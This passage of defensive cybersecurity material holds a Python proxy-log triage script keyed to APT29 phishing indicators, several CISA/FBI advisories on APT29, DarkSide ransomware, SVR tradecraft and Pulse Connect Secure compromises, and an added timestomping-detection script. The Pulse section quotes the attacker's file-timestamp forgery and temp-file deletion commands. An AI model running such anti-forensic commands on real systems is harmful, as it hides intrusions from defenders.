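def classify_request(rec: dict, domains: set[str], ips: set[str]) -> list[str]:
    tags = []
    if domain_hit(rec["host"], domains) or rec["ip"] in ips:
        tags.append("ioc-match")
        if rec["url"].endswith(BEACON_URI):
            tags.append("beacon-uri")        # counted only at an IOC host; the path alone is weak
    elif rec["host"].lower() == LEGIT_REDIRECTOR and "/tn.jsp?f=" in rec["url"]:
        tags.append("constant-contact-redirect")
    return tags


def triage(lines, ioc_text: str = IOC_TEXT, beacon_threshold: int = 3) -> dict[str, str]:
    """Return a verdict per client address."""
    domains, ips = load_iocs(ioc_text)
    per_client: dict[str, list[str]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_client[rec["client"]].extend(classify_request(rec, domains, ips))
    verdicts = {}
    for client, tags in per_client.items():
        if tags.count("beacon-uri") >= beacon_threshold:
            verdicts[client] = "c2-beaconing"
        elif "ioc-match" in tags:
            verdicts[client] = "ioc-contact"
        elif "constant-contact-redirect" in tags:
            verdicts[client] = "newsletter-click-only"   # record it, do not alert
        else:
            verdicts[client] = "clean"
    return verdicts


# Constructed proxy log; the 10.0.0.0/24 clients and 203.0.113.10 are made up.
SAMPLE_LOG = """
2021-05-25T14:02:11Z 10.0.0.21 r20.rs6.net 208.75.122.11 https://r20.rs6.net/tn.jsp?f=constructed
2021-05-25T14:02:12Z 10.0.0.21 usaid.theyardservice.com 83.171.237.173 https://usaid.theyardservice.com/d/recipient@example.invalid
2021-05-25T14:05:40Z 10.0.0.21 dataplane.theyardservice.com 83.171.237.173 https://dataplane.theyardservice.com/jquery-3.3.1.min.woff2
2021-05-25T14:06:40Z 10.0.0.21 cdn.theyardservice.com 83.171.237.173 https://cdn.theyardservice.com/jquery-3.3.1.min.woff2
2021-05-25T14:07:40Z 10.0.0.21 static.theyardservice.com 83.171.237.173 https://static.theyardservice.com/jquery-3.3.1.min.woff2
2021-05-25T14:03:00Z 10.0.0.22 r20.rs6.net 208.75.122.11 https://r20.rs6.net/tn.jsp?f=constructed
2021-05-25T14:09:00Z 10.0.0.23 www.example.invalid 203.0.113.10 https://www.example.invalid/index.html
2021-05-25T14:09:30Z 10.0.0.24 www.example.invalid 203.0.113.10 https://www.example.invalid/jquery-3.3.1.min.woff2
2021-05-25T15:00:00Z 10.0.0.25 worldhomeoutlet.com 192.99.221.77 https://worldhomeoutlet.com/
"""


if __name__ == "__main__":
    for client, verdict in sorted(triage(SAMPLE_LOG.splitlines()).items()):
        print(client, verdict)
```

The redirector is kept out of the IOC set on purpose: the advisory lists r20.rs6.net as legitimate Constant Contact infrastructure, so it is useful as context for a later hit on the actor's domain but would drown the alert queue if matched on its own.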
    Resources

    - Volexity Blog: Suspected APT29 Operation Launches Election Fraud Themed Phishing Campaigns | Volexity
    - Microsoft Blog: New sophisticated email-based attack from NOBELIUM - Microsoft Security
    - Microsoft Blog: Another Nobelium Cyberattack

    Contact Information

    To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at CISAServiceDesk@cisa.dhs.gov.

    This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see http://www.us-cert.gov/tlp/.

    References

    [1] Microsoft Blog: New Sophisticated Email-Based Attack from NOBELIUM
    [2] Ibid.
    [3] Volexity Blog: Suspected APT29 Operation Launches Election Fraud Themed Phishing Campaigns
    [4] MITRE ATT&CK: Cobalt Strike

    Revisions

    - May 28, 2021: Initial version
    - May 29, 2021: Added final sentence of first paragraph in Summary section

  • AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks
    by CISA on 11 Maggio 2021 at 7:00 pm

    Original release date: May 11, 2021 | Last revised: July 8, 2021SummaryThis Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques. The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are aware of a ransomware attack affecting a critical infrastructure (CI) entity—a pipeline company—in the United States. Malicious cyber actors deployed DarkSide ransomware against the pipeline company’s information technology (IT) network.[1] At this time, there is no indication that the entity’s operational technology (OT) networks have been directly affected by the ransomware. CISA and FBI urge CI asset owners and operators to adopt a heightened state of awareness and implement the recommendations listed in the Mitigations section of this Joint Cybersecurity Advisory, including implementing robust network segmentation between IT and OT networks; regularly testing manual controls; and ensuring that backups are implemented, regularly tested, and isolated from network connections. These mitigations will help CI owners and operators improve their entity's functional resilience by reducing their vulnerability to ransomware and the risk of severe business degradation if impacted by ransomware. (Updated May 19, 2021): Click here for a STIX package of indicators of compromise (IOCs). Note: These IOCs were shared with critical infrastructure partners and network defenders on May 10, 2021. The applications listed in the IOCs were leveraged by the threat actors during the course of a compromise. Some of these applications might appear within an organization's enterprise to support legitimate purposes; however, these applications can be used by threat actors to aid in malicious exploitation of an organization's enterprise. 
CISA and FBI recommend removing any application not deemed necessary for day-to-day operations. (Updated July 08, 2021): Click here for downloadable IOCs associated with a sample of a DarkSide ransomware variant analyzed by CISA and FBI. Note: CISA and FBI have no evidence that this sample is related to the pipeline incident detailed in this CSA. This variant executes a dynamic-link library (DLL) program used to delete Volume Shadow copies available on the system. The malware collects, encrypts, and sends system information to the threat actor’s command and control (C2) domains and generates a ransom note to the victim. For more information about this variant, refer to Malware Analysis Report MAR-10337802-1.v1: DarkSide Ransomware.  Click here for a PDF version of this report. Technical DetailsNote: the analysis in this Joint Cybersecurity Advisory is ongoing, and the information provided should not be considered comprehensive. CISA and FBI will update this advisory as new information is available. After gaining initial access to the pipeline company’s network, DarkSide actors deployed DarkSide ransomware against the company’s IT network. In response to the cyberattack, the company has reported that they proactively disconnected certain OT systems to ensure the systems’ safety.[2] At this time, there are no indications that the threat actor moved laterally to OT systems. DarkSide is ransomware-as-a-service (RaaS)—the developers of the ransomware receive a share of the proceeds from the cybercriminal actors who deploy it, known as “affiliates.” According to open-source reporting, since August 2020, DarkSide actors have been targeting multiple large, high-revenue organizations, resulting in the encryption and theft of sensitive data. 
    The DarkSide group has publicly stated that they prefer to target organizations that can afford to pay large ransoms instead of hospitals, schools, non-profits, and governments.[3],[4]

    According to open-source reporting, DarkSide actors have previously been observed gaining initial access through phishing and exploiting remotely accessible accounts and systems and Virtual Desktop Infrastructure (VDI) (Phishing [T1566], Exploit Public-Facing Application [T1190], External Remote Services [T1133]).[5],[6] DarkSide actors have also been observed using Remote Desktop Protocol (RDP) to maintain Persistence [TA0003].[7] After gaining access, DarkSide actors deploy DarkSide ransomware to encrypt and steal sensitive data (Data Encrypted for Impact [T1486]). The actors then threaten to publicly release the data if the ransom is not paid.[8],[9] The DarkSide ransomware uses Salsa20 and RSA encryption.[10] DarkSide actors primarily use The Onion Router (TOR) for Command and Control (C2) [TA0011] (Proxy: Multi-hop Proxy [T1090.003]).[11],[12] The actors have also been observed using Cobalt Strike for C2.[13]

    Mitigations

    CISA and FBI urge CI owners and operators to apply the following mitigations to reduce the risk of compromise by ransomware attacks.

    - Require multi-factor authentication for remote access to OT and IT networks.
    - Enable strong spam filters to prevent phishing emails from reaching end users. Filter emails containing executable files from reaching end users.
    - Implement a user training program and simulated attacks for spearphishing to discourage users from visiting malicious websites or opening malicious attachments and reinforce the appropriate user responses to spearphishing emails.
    - Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses.
    - Prevent users from accessing malicious websites by implementing URL blocklists and/or allowlists.
    - Update software, including operating systems, applications, and firmware on IT network assets, in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program.
    - Limit access to resources over networks, especially by restricting RDP. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require multi-factor authentication.
    - Set antivirus/antimalware programs to conduct regular scans of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.
    - Implement unauthorized execution prevention by:
      - Disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
      - Implementing application allowlisting, which only allows systems to execute programs known and permitted by security policy. Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers or compression/decompression programs, including the AppData/LocalAppData folder.
    - Monitor and/or block inbound connections from Tor exit nodes and other anonymization services to IP addresses and ports for which external connections are not expected (i.e., other than VPN gateways, mail ports, web ports). For more guidance, refer to Joint Cybersecurity Advisory AA20-183A: Defending Against Malicious Cyber Activity Originating from Tor.
    - Deploy signatures to detect and/or block inbound connections from Cobalt Strike servers and other post-exploitation tools.
    CISA and FBI urge CI owners and operators to apply the following mitigations now to reduce the risk of severe business or functional degradation should their CI entity fall victim to a ransomware attack in the future.

    - Implement and ensure robust network segmentation between IT and OT networks to limit the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone that eliminates unregulated communication between the IT and OT networks.
    - Organize OT assets into logical zones by taking into account criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to filter network traffic and monitor communications between zones. Prohibit industrial control system (ICS) protocols from traversing the IT network.
    - Identify OT and IT network inter-dependencies and develop workarounds or manual controls to ensure ICS networks can be isolated if the connections create risk to the safe and reliable operation of OT processes. Regularly test contingency plans such as manual controls so that safety critical functions can be maintained during a cyber incident. Ensure that the OT network can operate at necessary capacity even if the IT network is compromised.
    - Regularly test manual controls so that critical functions can be kept running if ICS or OT networks need to be taken offline.
    - Implement regular data backup procedures on both the IT and OT networks. Backup procedures should be conducted on a frequent, regular basis. The data backup procedures should also address the following best practices:
      - Ensure that backups are regularly tested.
      - Store your backups separately. Backups should be isolated from network connections that could enable the spread of ransomware. It is important that backups be maintained offline as many ransomware variants attempt to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems to its previous state. Best practice is to store your backups on a separate device that cannot be accessed from a network, such as on an external hard drive. (See the Software Engineering Institute’s page on ransomware.)
      - Maintain regularly updated “gold images” of critical systems in the event they need to be rebuilt. This entails maintaining image “templates” that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server.
      - Retain backup hardware to rebuild systems in the event rebuilding the primary system is not preferred. Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images.
      - Store source code or executables. It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases.
    - Ensure user and process accounts are limited through account use policies, user account control, and privileged account management. Organize access rights based on the principles of least privilege and separation of duties.

    If your organization is impacted by a ransomware incident, CISA and FBI recommend the following actions:

    - Isolate the infected system. Remove the infected system from all networks, and disable the computer’s wireless, Bluetooth, and any other potential networking capabilities. Ensure all shared and networked drives are disconnected, whether wired or wireless.
    - Turn off other computers and devices. Power off and segregate (i.e., remove from the network) the infected computer(s). Power off and segregate any other computers or devices that shared a network with the infected computer(s) that have not been fully encrypted by ransomware. If possible, collect and secure all infected and potentially infected computers and devices in a central location, making sure to clearly label any computers that have been encrypted. Powering off and segregating infected computers and computers that have not been fully encrypted may allow for the recovery of partially encrypted files by specialists. (See Before You Connect a New Computer to the Internet for tips on how to make a computer more secure before you reconnect it to a network.)
    - Secure your backups. Ensure that your backup data is offline and secure. If possible, scan your backup data with an antivirus program to check that it is free of malware.

    Refer to Joint Cybersecurity Advisory AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity for more best practices on incident response.

    Note: CISA and the FBI do not encourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or may fund illicit activities. Paying the ransom also does not guarantee that a victim’s files will be recovered. CISA and FBI urge you to report ransomware incidents to your local FBI field office.

    CISA offers a range of no-cost cyber hygiene services to help CI organizations assess, identify and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
    Resources

    - CISA and MS-ISAC: Joint Ransomware Guide
    - CISA: Ransomware page
    - CISA Tip: Protecting Against Ransomware
    - CISA: CISA Ransomware One-Pager and Technical Document
    - CISA Insights: Ransomware Outbreak
    - CISA: Pipeline Cybersecurity Initiative
    - CISA Webinar: Combating Ransomware
    - CISA: Cybersecurity Practices for Industrial Control Systems
    - FBI: Incidents of Ransomware on the Rise
    - National Security Agency (NSA): Stop Malicious Cyber Activity Against Connected Operational Technology
    - Department of Energy: Oil and Natural Gas Subsector Cybersecurity Capability Maturity Model
    - Transportation Security Agency: Pipeline Security Guidelines
    - National Institute of Standards and Technology (NIST): Framework for Improving Critical Infrastructure Cybersecurity
    - NIST: Ransomware Protection and Response
    - NIST: Data Integrity: Identifying and Protecting Assets Against Ransomware and Other Destructive Events
    - NIST: Data Integrity: Detecting and Responding to Ransomware and Other Destructive Events
    - NIST: Data Integrity: Recovering from Ransomware and Other Destructive Events
    - NIST: Guide to Industrial Control Systems (ICS) Security
    - Software Engineering Institute: Ransomware: Best Practices for Prevention and Response
    - NIST Fact Sheet: How Do I Stay Prepared?

    Contact Information

    Victims of ransomware should report it immediately to CISA at https://us-cert.cisa.gov/report, a local FBI Field Office, or U.S. Secret Service Field Office. To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at CISAServiceDesk@cisa.dhs.gov.

    References

    [1] Colonial Pipeline Media Statement on Pipeline Disruption
    [2] Ibid.
    [3] SonicWall: Darkside Ransomware Targets Large Corporations. Charges up to $2M.
    [4] Varonis: Return of the Darkside: Analysis of a Large-Scale Data Theft Campaign
    [5] BankInfo Security: FBI: DarkSide Ransomware Used in Colonial Pipeline Attack
    [6] Varonis: Return of the Darkside: Analysis of a Large-Scale Data Theft Campaign
    [7] Ibid.
    [8] SonicWall: Darkside Ransomware Targets Large Corporations. Charges up to $2M.
    [9] Varonis: Return of the Darkside: Analysis of a Large-Scale Data Theft Campaign
    [10] McAfee: Threat Landscape Dashboard DarkSide – Ransomware
    [11] SonicWall: Darkside Ransomware Targets Large Corporations. Charges up to $2M.
    [12] Varonis: Return of the Darkside: Analysis of a Large-Scale Data Theft Campaign
    [13] McAfee: Threat Landscape Dashboard DarkSide – Ransomware

    Revisions

    - May 11, 2021: Initial Version
    - May 12, 2021: Added additional resources
    - May 19, 2021: Added IOCs
    - July 8, 2021: Added MAR-10337802-1.v1 and associated IOCs

  • AA21-116A: Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders
    by CISA on 26 April 2021 at 3:00 pm

    Original release date: April 26, 2021

    Summary

    The Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium—will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled “Russian SVR Targets U.S. and Allied Networks,” released on April 15, 2021.

    The FBI and DHS are providing information on the SVR’s cyber tools, targets, techniques, and capabilities to aid organizations in conducting their own investigations and securing their networks.

    Threat Overview

    SVR cyber operations have posed a longstanding threat to the United States. Prior to 2018, several private cyber security companies published reports about APT 29 operations to obtain access to victim networks and steal information, highlighting the use of customized tools to maximize stealth inside victim networks and APT 29 actors’ ability to move within victim environments undetected. Beginning in 2018, the FBI observed the SVR shift from using malware on victim networks to targeting cloud resources, particularly e-mail, to obtain information. The exploitation of Microsoft Office 365 environments following network access gained through use of modified SolarWinds software reflects this continuing trend. Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations.

    Technical Details

    SVR Cyber Operations Tactics, Techniques, and Procedures

    Password Spraying

    In one 2018 compromise of a large network, SVR cyber actors used password spraying to identify a weak password associated with an administrative account. The actors conducted the password spraying activity in a “low and slow” manner, attempting a small number of passwords at infrequent intervals, possibly to avoid detection. The password spraying used a large number of IP addresses all located in the same country as the victim, including those associated with residential, commercial, mobile, and The Onion Router (TOR) addresses.

    The organization unintentionally exempted the compromised administrator’s account from multi-factor authentication requirements. With access to the administrative account, the actors modified permissions of specific e-mail accounts on the network, allowing any authenticated network user to read those accounts.

    The actors also used the misconfiguration for compromised non-administrative accounts. That misconfiguration enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication. The FBI suspects this was achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple’s mail client and old versions of Microsoft Outlook. After logging in as a non-administrative user, the actors used the permission changes applied by the compromised administrative user to access specific mailboxes of interest within the victim organization.
    While the password sprays were conducted from many different IP addresses, once the actors obtained access to an account, that compromised account was generally only accessed from a single IP address corresponding to a leased virtual private server (VPS). The FBI observed minimal overlap between the VPSs used for different compromised accounts, and each leased server used to conduct follow-on actions was in the same country as the victim organization. During the period of their access, the actors consistently logged into the administrative account to modify account permissions, including removing their access to accounts presumed to no longer be of interest, or adding permissions to additional accounts.

    Recommendations

    To defend from this technique, the FBI and DHS recommend that network operators follow best practices for configuring access to cloud computing environments, including:

    - Mandatory use of an approved multi-factor authentication solution for all users from both on-premises and remote locations.
    - Prohibit remote access to administrative functions and resources from IP addresses and systems not owned by the organization.
    - Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes.
    - Where possible, enforce the use of strong passwords and prevent the use of easily guessed or commonly used passwords through technical means, especially for administrative accounts.
    - Regularly review the organization’s password management program.
    - Ensure the organization’s information technology (IT) support team has well-documented standard operating procedures for password resets of user account lockouts.
    - Maintain a regular cadence of security awareness training for all company employees.

    Leveraging Zero-Day Vulnerability

    In a separate incident, SVR actors used CVE-2019-19781, a zero-day exploit at the time, against a virtual private network (VPN) appliance to obtain network access.
    Following exploitation of the device in a way that exposed user credentials, the actors identified and authenticated to systems on the network using the exposed credentials. The actors worked to establish a foothold on several different systems that were not configured to require multi-factor authentication and attempted to access web-based resources in specific areas of the network in line with information of interest to a foreign intelligence service.

    Following initial discovery, the victim attempted to evict the actors. However, the victim had not identified the initial point of access, and the actors used the same VPN appliance vulnerability to regain access. Eventually, the initial access point was identified, removed from the network, and the actors were evicted. As in the previous case, the actors used dedicated VPSs located in the same country as the victim, probably to make it appear that the network traffic was not anomalous with normal activity.

    Recommendations

    To defend from this technique, the FBI and DHS recommend network defenders ensure endpoint monitoring solutions are configured to identify evidence of lateral movement within the network and:

    - Monitor the network for evidence of encoded PowerShell commands and execution of network scanning tools, such as NMAP.
    - Ensure host-based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.
    - Require use of multi-factor authentication to access internal systems.
    - Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization’s security baseline and incorporate into enterprise monitoring tools.

    WELLMESS Malware

    In 2020, the governments of the United Kingdom, Canada, and the United States attributed intrusions perpetrated using malware known as WELLMESS to APT 29. WELLMESS was written in the Go programming language, and the previously-identified activity appeared to focus on targeting COVID-19 vaccine development. The FBI’s investigation revealed that following initial compromise of a network—normally through an unpatched, publicly-known vulnerability—the actors deployed WELLMESS. Once on the network, the actors targeted each organization’s vaccine research repository and Active Directory servers. These intrusions, which mostly relied on targeting on-premises network resources, were a departure from historic tradecraft, and likely indicate new ways the actors are evolving in the virtual environment. More information about the specifics of the malware used in this intrusion has been previously released and is referenced in the ‘Resources’ section of this document.

    Tradecraft Similarities of SolarWinds-enabled Intrusions

    During the spring and summer of 2020, using modified SolarWinds network monitoring software as an initial intrusion vector, SVR cyber operators began to expand their access to numerous networks. The SVR’s modification and use of trusted SolarWinds products as an intrusion vector is also a notable departure from the SVR’s historic tradecraft. The FBI’s initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions.

    After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.
    Recommendations

    Although defending a network from a compromise of trusted software is difficult, some organizations successfully detected and prevented follow-on exploitation activity from the initial malicious SolarWinds software. This was achieved using a variety of monitoring techniques including:

    - Auditing log files to identify attempts to access privileged certificates and creation of fake identity providers.
    - Deploying software to identify suspicious behavior on systems, including the execution of encoded PowerShell.
    - Deploying endpoint protection systems with the ability to monitor for behavioral indicators of compromise.
    - Using available public resources to identify credential abuse within cloud environments.
    - Configuring authentication mechanisms to confirm certain user activities on systems, including registering new devices.

    While few victim organizations were able to identify the initial access vector as SolarWinds software, some were able to correlate different alerts to identify unauthorized activity. The FBI and DHS believe those indicators, coupled with stronger network segmentation (particularly “zero trust” architectures or limited trust between identity providers) and log correlation, can enable network defenders to identify suspicious activity requiring additional investigation.

    General Tradecraft Observations

    SVR cyber operators are capable adversaries. In addition to the techniques described above, FBI investigations have revealed infrastructure used in the intrusions is frequently obtained using false identities and cryptocurrencies. VPS infrastructure is often procured from a network of VPS resellers. These false identities are usually supported by low reputation infrastructure including temporary e-mail accounts and temporary voice over internet protocol (VoIP) telephone numbers. While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains. The FBI also notes SVR cyber operators have used open source or commercially available tools continuously, including Mimikatz—an open source credential-dumping tool—and Cobalt Strike—a commercially available exploitation tool.

    Mitigations

    The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services.

    Resources

    - NSA, CISA, FBI Joint Cybersecurity Advisory: Russian SVR Targets U.S. and Allied Networks
    - CISA: Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise
    - CISA Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments
    - FBI, CISA, ODNI, NSA Joint Statement: Joint Statement by the Federal Bureau of Investigation, the Cybersecurity and Infrastructure Security Agency, the Office of the Director of National Intelligence (ODNI), and the National Security Agency
    - CISA Alert AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
    - CISA Insights: What Every Leader Needs to Know about the Ongoing APT Cyber Activity
    - FBI, CISA Joint Cybersecurity Advisory: Advanced Persistent Threat Actors Targeting U.S. Think Tanks
    - CISA: Malicious Activity Targeting COVID-19 Research, Vaccine Development
    - NCSC, CSE, NSA, CISA Advisory: APT 29 targets COVID-19 vaccine development

    Revisions

    - April 26, 2021: Initial Version

  • AA21-110A: Exploitation of Pulse Connect Secure Vulnerabilities
    by CISA on 20 April 2021 at 3:03 pm

    Original release date: April 20, 2021 | Last revised: July 21, 2021

    Summary

    The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting a number of U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor—or actors—beginning in June 2020 or earlier related to vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA and Ivanti have assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the Pulse Secure Connect Integrity Tool. To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893. The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.

    (Updated May 3, 2021): Ivanti has released Security Advisory SA44784 addressing CVE-2021-22893 and three additional newly disclosed CVEs—CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to immediately run the Pulse Secure Connect Integrity Tool, update to the latest software version, and investigate for malicious activity.

    (Updated May 27, 2021): CISA has updated this alert to include new threat actor techniques, tactics, and procedures (TTPs), indicators of compromise (IOCs), and updated mitigations. See Ivanti KB44755 - Pulse Connect Secure (PCS) Integrity Assurance for updated guidance to ensure the full integrity of your Pulse Connect Secure software.

    (Updated July 21, 2021): Please see our new Malware Analysis Reports in regards to adversary activity analyzed by CISA that was discovered on Pulse Secure Connect devices. For a downloadable list of indicators of compromise (IOCs), see AA21-110A.stix.

    Technical Details

    On March 31, 2021, Ivanti released the Pulse Secure Connect Integrity Tool to check the integrity of Pulse Connect Secure appliances. Their technical bulletin states:

        We are aware of reports that a limited number of customers have identified unusual activity on their Pulse Connect Secure (PCS) appliances. The investigation to date shows ongoing attempts to exploit vulnerabilities outlined in two security advisories that were patched in 2019 and 2020 to address previously known issues: Security Advisory SA44101 (CVE-2019-11510) and Security Advisory SA44601 (CVE-2020-8260). For more information visit KB44764 (Customer FAQ).

    (Updated May 27, 2021): CISA has observed the cyber threat actor performing cleanup as demonstrated by the following:

    1. The threat actor was observed timestomping the trojanized umount binary to match the timestamps of legitimate binaries, attempting to disguise the modifications (see https://attack.mitre.org/techniques/T1070/006/). The touch command was used to modify the time stamp:

           /bin/touch /tmp/data/root/bin/umount -r /tmp/data/root/bin/cp

    2. The threat actor deleted files from temp directories using "rm -f":

           /bin/rm -f tmp1
           /bin/rm -f tmp2

    3. Timestamps. Note: for context, loop 6 is the active partition and loop 8 is the rollback partition of the device.
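The timestamp table that follows can be read mechanically. Here is an added example (not CISA's code) of two forensic heuristics a defender can apply to it: `touch -r` copies a reference file's access and modification times, but the Linux kernel sets a file's metadata change time (ctime) to the current clock on every change, and `touch` has no option to set it, so a system binary whose ctime is much newer than its mtime has been altered after the time its mtime claims; and when that ctime coincides with the last access time of `/bin/touch` on the same partition, the tool that changed it is visible too. The record structure is an assumption for this example; the timestamp values are the ones in the table.

```python
"""Added example: timestomping heuristics over stat-style records.

Heuristic 1: ctime later than mtime by more than a small slack.
Heuristic 2: a binary's ctime within a few seconds of /bin/touch's atime on
the same partition. Both are leads to review, not verdicts: package upgrades,
chmod/chown and similar legitimate operations also bump ctime."""
from datetime import datetime, timedelta


def parse_ts(s):
    """Parse the table's 'M/D/YY H:MM:SS' form (all times are GMT)."""
    return datetime.strptime(s, "%m/%d/%y %H:%M:%S")


# Values taken from the advisory's timestamp table, keyed by (partition, path).
# The dict-of-fields layout is an assumption of this example.
STAT_RECORDS = {
    ("pulse-loop6", "/bin/umount"): {"mtime": parse_ts("4/13/21 5:15:33"),
                                     "ctime": parse_ts("4/20/21 19:18:49"),
                                     "atime": parse_ts("4/23/21 16:14:48")},
    ("pulse-loop8", "/bin/umount"): {"mtime": parse_ts("4/20/21 19:09:14"),
                                     "ctime": parse_ts("4/20/21 19:09:14"),
                                     "atime": parse_ts("5/6/21 14:27:20")},
    ("pulse-loop6", "/bin/touch"):  {"atime": parse_ts("4/20/21 19:08:01")},
    ("pulse-loop8", "/bin/touch"):  {"atime": parse_ts("4/20/21 19:09:14")},
}


def ctime_newer_than_mtime(records, slack=timedelta(minutes=5)):
    """Heuristic 1: return (partition, path, ctime - mtime) for every record
    whose metadata change time trails its content modification time by more
    than `slack`. A backdated mtime cannot drag ctime back with it."""
    hits = []
    for (part, path), st in records.items():
        if "mtime" in st and "ctime" in st and st["ctime"] - st["mtime"] > slack:
            hits.append((part, path, st["ctime"] - st["mtime"]))
    return hits


def ctime_matches_touch(records, tolerance=timedelta(seconds=2)):
    """Heuristic 2: return (partition, path) for binaries whose ctime lies
    within `tolerance` of the last access time of /bin/touch on the same
    partition, i.e. touch ran at the moment the metadata changed."""
    hits = []
    for (part, path), st in records.items():
        if path == "/bin/touch" or "ctime" not in st:
            continue
        touch = records.get((part, "/bin/touch"))
        if touch and abs(st["ctime"] - touch["atime"]) <= tolerance:
            hits.append((part, path))
    return hits


def review_candidates(records):
    """Union of both heuristics as a sorted list of (partition, path)."""
    found = {(p, f) for p, f, _ in ctime_newer_than_mtime(records)}
    found.update(ctime_matches_touch(records))
    return sorted(found)


if __name__ == "__main__":
    for part, path, gap in ctime_newer_than_mtime(STAT_RECORDS):
        print(f"{part} {path}: ctime is {gap} newer than mtime")
    for part, path in ctime_matches_touch(STAT_RECORDS):
        print(f"{part} {path}: ctime coincides with /bin/touch access")
```

On the table's values the two heuristics fire on different partitions: on pulse-loop6 the umount binary's ctime (4/20 19:18:49) is seven days newer than the mtime it was given (4/13 5:15:33), while on pulse-loop8 the umount ctime is identical to the second /bin/touch was last run (4/20 19:09:14). Either alone is a lead; both together on the same path across the active and rollback partitions is what makes this worth escalating. On a live appliance the same checks can be run over `stat` output for every file under `/bin` and the web root, with the Integrity Tool's result as the authoritative cross-check.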
    Date     Time (GMT)  Partition    Artifact     Activity
    4/13/21  5:15:33     pulse-loop6  /bin/umount  Content Modification Time
    4/20/21  19:09:14    pulse-loop8  /bin/umount  Metadata Modification Time
